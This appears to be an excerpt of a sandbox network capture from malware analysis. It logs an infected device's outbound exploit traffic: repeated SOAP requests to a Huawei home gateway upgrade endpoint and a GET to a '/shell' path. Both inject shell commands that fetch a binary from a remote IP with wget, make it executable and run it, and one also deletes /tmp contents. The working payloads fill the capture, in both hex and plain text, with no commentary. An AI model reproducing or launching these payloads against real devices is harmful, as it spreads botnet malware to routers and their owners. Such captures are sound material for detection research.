2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:54.852169991 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:02.275089979 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:16.865202904 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:46.301075935 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            215192.168.2.2358918194.47.64.1780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.772871017 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            216192.168.2.2341622156.241.121.1537215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.813013077 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:49.796866894 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:52.292550087 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:57.155831099 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
